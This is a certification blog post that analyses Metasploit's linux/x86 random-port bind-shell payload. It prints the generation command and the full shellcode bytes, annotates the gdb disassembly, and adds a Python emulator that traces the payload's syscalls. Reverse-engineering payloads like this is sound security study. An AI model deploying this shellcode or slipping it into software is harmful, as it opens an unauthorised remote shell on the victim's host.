Saturday, May 10, 2014

[SLAE] V-3 Analyzing Metasploit linux/x86/shell_bind_tcp_random_port payload

Source: SecurityTube


I explain every line that needs explanation. I hope it is explained well enough; if you don't understand something, leave me a comment and I will answer all questions.

1) We need to generate our payload for later analysis
msfpayload linux/x86/shell_bind_tcp_random_port C
/*
 * linux/x86/shell_bind_tcp_random_port - 57 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false
 */
unsigned char payload[] = 
"\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a\x02\x89\xe1\xcd\x80"
"\x52\x50\x89\xe1\xb0\x66\xb3\x04\xcd\x80\xb0\x66\x43\xcd\x80"
"\x59\x93\x6a\x3f\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\xcd\x80";

Compilation: gcc -ggdb -z execstack -fno-stack-protector shellcode.c -o shellcode
The source of the .C wrapper can be found here.
To start, I recommend that you check my earlier post about the bind shell.
2) Analyzing with GDB

gdb -q ./shellcode

=> 0x0804a040 <+0>:        xor    ebx,ebx ; 0
   0x0804a042 <+2>:        mul    ebx     ; 0
   0x0804a044 <+4>:        mov    al,0x66 ; 102 == socketcall 
   0x0804a046 <+6>:        inc    ebx     ; 1   == sys_socket  -> int socket (int family, int type, int protocol);
   0x0804a047 <+7>:        push   edx     ; 0 == system default (tcp/udp) - int protocol
   0x0804a048 <+8>:        push   ebx     ; 1 == SOCK_STREAM 
   0x0804a049 <+9>:        push   0x2     ; 2 == AF_INET - int family
   0x0804a04b <+11>:       mov    ecx,esp ; save pointer to args
   0x0804a04d <+13>:       int    0x80    ; syscall
   0x0804a04f <+15>:       push   edx     ; 0
   0x0804a050 <+16>:       push   eax     ; 7
   0x0804a051 <+17>:       mov    ecx,esp ; save pointer
   0x0804a053 <+19>:       mov    al,0x66 ; 102 == socketcall
   0x0804a055 <+21>:       mov    bl,0x4  ; 4   == sys_listen
   0x0804a057 <+23>:       int    0x80    ; syscall
   0x0804a059 <+25>:       mov    al,0x66 ; 102 == socketcall
   0x0804a05b <+27>:       inc    ebx     ; 5   == sys_accept; since no bind() is ever called, the kernel assigns a random (ephemeral) port when listen() runs, see man accept / man listen for more information
   0x0804a05c <+28>:       int    0x80    ; syscall
   0x0804a05e <+30>:       pop    ecx     ; 7
   0x0804a05f <+31>:       xchg   ebx,eax ; ebx = 8, eax = 5
   0x0804a060 <+32>:       push   0x3f    ; 63
   0x0804a062 <+34>:       pop    eax     ; eax = 63 = dup2, redirects STDIN/STDOUT/STDERR to the accepted socket;
                                                          this loop runs 8 times, from fd 7 down to 0
   0x0804a063 <+35>:       int    0x80       ; syscall
   0x0804a065 <+37>:       dec    ecx        ; ecx -1
   0x0804a066 <+38>:       jns    0x804a060  ; jump back to <+32> while ecx >= 0 (sign flag clear)
   0x0804a068 <+40>:       mov    al,0xb     ; 11 == execve
   0x0804a06a <+42>:       push   0x68732f2f ; hs//
   0x0804a06f <+47>:       push   0x6e69622f ; nib/ <- /bin/sh start
   0x0804a074 <+52>:       mov    ebx,esp    ; save pointer to "/bin//sh" - const char *filename
   0x0804a076 <+54>:       inc    ecx        ; ecx = -1 + 1 = 0 == NULL argv (edx is already 0 == NULL envp)
   0x0804a077 <+55>:       int    0x80       ; syscall
   0x0804a079 <+57>:       add    BYTE PTR [eax],al ; not part of the payload: gdb disassembling the null bytes after it
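To double-check the walkthrough above without a debugger, here is an added example (not part of the original post or of Metasploit): a tiny emulator for the handful of x86 opcodes this payload uses. It walks the 57 bytes quoted above and records the syscalls they would issue; kernel return values are faked, with socket() and accept() handing out descriptors starting at a chosen number (7 reproduces the fd values seen in the gdb session).

```python
import struct

# The 57-byte payload quoted above (linux/x86/shell_bind_tcp_random_port).
PAYLOAD = bytes.fromhex(
    "31dbf7e3b0664352536a0289e1cd80525089e1b066b304cd80b06643cd80"
    "59936a3f58cd804979f8b00b682f2f7368682f62696e89e341cd80")
SYSCALL = {102: "socketcall", 63: "dup2", 11: "execve"}
SUBCALL = {1: "socket", 4: "listen", 5: "accept"}

def trace_syscalls(code, first_fd=7):
    """Emulate the few x86 opcodes this payload uses and return the syscalls it
    issues, in order. Kernel returns are faked: socket() and accept() hand out
    descriptors starting at first_fd (7 reproduces the gdb session above)."""
    r = {"eax": 0, "ebx": 0, "ecx": 0, "edx": 0}
    stack, calls, ip, fd, sf = [], [], 0, first_fd, False   # sf = sign flag
    def setlow(reg, v): r[reg] = (r[reg] & ~0xff) | v       # mov al/bl, imm8
    while ip < len(code):
        op, nxt = code[ip], (code[ip + 1] if ip + 1 < len(code) else 0)
        if (op, nxt) == (0x31, 0xdb): r["ebx"] = 0; ip += 2             # xor ebx,ebx
        elif (op, nxt) == (0xf7, 0xe3):                                  # mul ebx
            p = r["eax"] * r["ebx"]; r["eax"], r["edx"] = p & 0xffffffff, p >> 32; ip += 2
        elif op == 0xb0: setlow("eax", nxt); ip += 2                     # mov al,imm8
        elif op == 0xb3: setlow("ebx", nxt); ip += 2                     # mov bl,imm8
        elif op == 0x43: r["ebx"] += 1; ip += 1                          # inc ebx
        elif op == 0x41: r["ecx"] += 1; ip += 1                          # inc ecx
        elif op == 0x49: r["ecx"] -= 1; sf = r["ecx"] < 0; ip += 1       # dec ecx (sets SF)
        elif op in (0x50, 0x52, 0x53):                                   # push eax/edx/ebx
            stack.append(r[{0x50: "eax", 0x52: "edx", 0x53: "ebx"}[op]]); ip += 1
        elif op == 0x6a: stack.append(nxt); ip += 2                      # push imm8
        elif op == 0x68: stack.append(struct.unpack_from("<I", code, ip + 1)[0]); ip += 5  # push imm32
        elif op == 0x58: r["eax"] = stack.pop(); ip += 1                 # pop eax
        elif op == 0x59: r["ecx"] = stack.pop(); ip += 1                 # pop ecx
        elif op == 0x93: r["eax"], r["ebx"] = r["ebx"], r["eax"]; ip += 1  # xchg ebx,eax
        elif (op, nxt) in ((0x89, 0xe1), (0x89, 0xe3)):                  # mov ecx/ebx,esp
            r["ecx" if nxt == 0xe1 else "ebx"] = ("esp", len(stack)); ip += 2
        elif op == 0x79: ip += 2 + (0 if sf else struct.unpack_from("<b", code, ip + 1)[0])  # jns rel8
        elif (op, nxt) == (0xcd, 0x80):                                  # int 0x80
            name = SYSCALL.get(r["eax"] & 0xff, f"sys_{r['eax'] & 0xff}")
            if name == "socketcall":
                sub = SUBCALL.get(r["ebx"], str(r["ebx"])); calls.append(f"socketcall({sub})")
                r["eax"] = 0 if sub == "listen" else fd; fd += sub != "listen"
            elif name == "dup2":
                calls.append(f"dup2({r['ebx']}, {r['ecx']})"); r["eax"] = r["ecx"]
            elif name == "execve":   # ebx = esp: read "/bin//sh" back off the emulated stack
                raw = b"".join(struct.pack("<I", v) for v in reversed(stack[:r["ebx"][1]]))
                path = raw[:raw.index(0)].decode()
                calls.append(f"execve({path!r})"); break
            ip += 2
        else: raise ValueError(f"unhandled opcode {op:#x} at offset {ip}")
    return calls
```

Running trace_syscalls(PAYLOAD) yields socket, listen, accept, eight dup2 calls from fd 7 down to 0, and execve('/bin//sh'); note that with a lower listening descriptor (first_fd=3) the dup2 loop is shorter, because its counter starts at whatever fd socket() returned.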

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

SLAE-513
